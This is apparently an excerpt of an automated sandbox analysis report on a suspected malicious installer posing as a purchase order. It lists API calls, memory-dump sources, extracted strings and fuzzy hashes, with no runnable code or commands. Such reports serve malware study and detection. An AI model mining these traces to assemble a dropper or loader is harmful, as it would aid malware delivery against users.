                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID:
                                                • API String ID: 587946157-0
                                                • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,0040402A), ref: 0040425D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                • Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
                                                • Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                • Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000), ref: 6E422B6B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 7e3dc7f9f99b8d867a8436687ad67187819d9be5cbbb8154271a1e3807a2520d
                                                • Instruction ID: 66ffe87fb056d42178762fb13f523e1839a36dfbd0dd6ec85530e27a10405798
                                                • Opcode Fuzzy Hash: 7e3dc7f9f99b8d867a8436687ad67187819d9be5cbbb8154271a1e3807a2520d
                                                • Instruction Fuzzy Hash: 034121715206049FDB20AFF5EE41F997768FB06368F20483BE5049BA04DF399445CBEA
                                                APIs
                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                  • Part of subcall function 00405322: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0), ref: 0040537D
                                                  • Part of subcall function 00405322: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll), ref: 0040538F
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                  • Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                  • Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                  • Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406756
                                                  • Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778
                                                  • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                • String ID:
                                                • API String ID: 2972824698-0
                                                • Opcode ID: 054540bee2fefd892e853d4b482315bab375db53780576269aa037752c2899f6
                                                • Instruction ID: 9073c6adce58ff193a4fc3832a7f1d33e0b572ffc6e746f3319226a0f770ccba
                                                • Opcode Fuzzy Hash: 054540bee2fefd892e853d4b482315bab375db53780576269aa037752c2899f6
                                                • Instruction Fuzzy Hash: 24F0F0329090219BDB20FBA189885DE72A49F44318B2441BBF902B20D1CBBC0E409A6E
                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,6E42123B,?,6E4212DF,00000019,6E4211BE,-000000A0), ref: 6E421225
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: a5246a2ba642b3b15eb89831e2b525ed40891f9b22958874d5236eda769f73db
                                                • Instruction ID: 55acac7f60a0dab6570e38b628839da5deab2240e7f9844d4ceda7da9f95afba
                                                • Opcode Fuzzy Hash: a5246a2ba642b3b15eb89831e2b525ed40891f9b22958874d5236eda769f73db
                                                • Instruction Fuzzy Hash: ACB01270A00400DFEE00EB74DE06F343254E701301F044000F600D8184C5244C00C535
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                • DeleteObject.GDI32(00000000), ref: 00404D94
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                • GlobalFree.KERNEL32(?), ref: 004050CE
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                • ShowWindow.USER32(00000000), ref: 0040527F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: 7y$ $M$N
                                                • API String ID: 1638840714-4022178371
                                                • Opcode ID: 5854385e31bdc5075e0f37eedfad40e889ac39e283741073fea961f0a68adea0
                                                • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                • Opcode Fuzzy Hash: 5854385e31bdc5075e0f37eedfad40e889ac39e283741073fea961f0a68adea0
                                                • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                                • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                  • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                  • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",0040336A,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                  • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                  • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",0040336A,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                  • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",0040336A,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                  • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                  • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                  • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: 7y$A$C:\Users\user\AppData\Local\sillinesses$Call
                                                • API String ID: 2624150263-3878473756
                                                • Opcode ID: 082bc0490930ef8e8035292689f000cd26c8d3a875d56adfc8dbeaba50cc4ed4
                                                • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                • Opcode Fuzzy Hash: 082bc0490930ef8e8035292689f000cd26c8d3a875d56adfc8dbeaba50cc4ed4
                                                • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                APIs
                                                  • Part of subcall function 6E42121B: GlobalAlloc.KERNELBASE(00000040,?,6E42123B,?,6E4212DF,00000019,6E4211BE,-000000A0), ref: 6E421225
                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6E421C6B
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6E421CB3
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6E421CBD
                                                • GlobalFree.KERNEL32(00000000), ref: 6E421CD0
                                                • GlobalFree.KERNEL32(?), ref: 6E421DB2
                                                • GlobalFree.KERNEL32(?), ref: 6E421DB7
                                                • GlobalFree.KERNEL32(?), ref: 6E421DBC
                                                • GlobalFree.KERNEL32(00000000), ref: 6E421FA6
                                                • lstrcpyW.KERNEL32(?,?), ref: 6E422140
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6E4221B5
                                                • LoadLibraryW.KERNEL32(00000008), ref: 6E4221C6
                                                • GetProcAddress.KERNEL32(?,?), ref: 6E422220
                                                • lstrlenW.KERNEL32(00000808), ref: 6E42223A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: 781c68a562c4275def2cb6efd09bc8267fed111bafce3b607de78853346f816a
                                                • Instruction ID: 4cadc110c2e7c353aad7fbce4b856cdba07702bdbf8ab717d15b7acb69b0b33d
                                                • Opcode Fuzzy Hash: 781c68a562c4275def2cb6efd09bc8267fed111bafce3b607de78853346f816a
                                                • Instruction Fuzzy Hash: 22228A71D24206DFDB609FF98880AEEB7B4FB05305F11453FD1A5A7380DBB25A8A8B54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p!C$p!C
                                                • API String ID: 0-3125587631
                                                • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                                • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                • GetSysColor.USER32(?), ref: 004044D0
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                • lstrlenW.KERNEL32(?), ref: 004044F1
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                • SendMessageW.USER32(00000000), ref: 00404573
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                • SetCursor.USER32(00000000), ref: 004045F2
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                • SetCursor.USER32(00000000), ref: 0040460E
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: 7y$Call$N$gC@
                                                • API String ID: 3103080414-3076107432
                                                • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                APIs
